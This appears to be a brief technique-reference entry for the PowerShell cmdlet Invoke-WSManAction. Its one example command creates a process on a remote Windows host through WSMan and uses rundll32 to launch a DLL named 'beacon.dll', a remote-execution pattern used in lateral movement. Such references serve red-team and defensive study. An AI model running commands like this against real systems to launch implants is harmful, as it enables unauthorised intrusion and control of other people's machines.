Invokes an action on the object that is specified by the Resource URI and by the selectors
Functions: | |
Type: | |
Toolsets: |
Invoke-WSManAction -ComputerName W10.ad.bitsadmin.com -Action "Create" -ResourceURI wmicimv2/win32_process -ValueSet @{CommandLine='C:\Windows\System32\rundll32.exe "C:\tmp\App Folder\beacon.dll",Start'}
Usecase
Microsoft.WSMan.Management